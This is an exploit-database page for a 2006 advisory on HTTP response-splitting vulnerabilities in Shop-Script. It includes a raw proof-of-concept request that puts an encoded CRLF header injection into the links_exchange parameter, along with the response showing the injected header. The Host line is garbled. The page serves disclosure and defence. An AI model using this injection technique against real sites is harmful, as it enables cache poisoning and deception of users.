header-logo
Suggest Exploit
vendor:
Shop-Script
by:
SecurityFocus
7,5
CVSS
HIGH
HTTP Response-Splitting
113
CWE
Product Name: Shop-Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Shop-Script Multiple HTTP Response-Splitting Vulnerabilities

Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/20685/info

Shop-Script is prone to multiple HTTP response-splitting vulnerabilities because the application fails to properly sanitize user-supplied input. 

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust.

[Request Header] 

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header 
HTTP/1.0 
Accept: */* 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET 
CLR 1.1.4322) 
Host: www.example.comhttp://www.shop-script-demo.com/
Content-Length: 18 
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa 
Connection: Close 
Pragma: no-cache 

current_currency=1 


[Response Header] 

HTTP/1.1 302 Found 
Date: Mon, 16 Oct 2006 17:39:57 GMT 
Server: Apache 
Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0 
Pragma: no-cache 
Location: index.php?links_exchange= 
FakeHeader:Fake_Custom_Header <= [Custome response 
injected by the attacker] 
Content-Length: 0 
Connection: close 
Content-Type: text/html

Navigation

Suggest Exploit

Services By CQR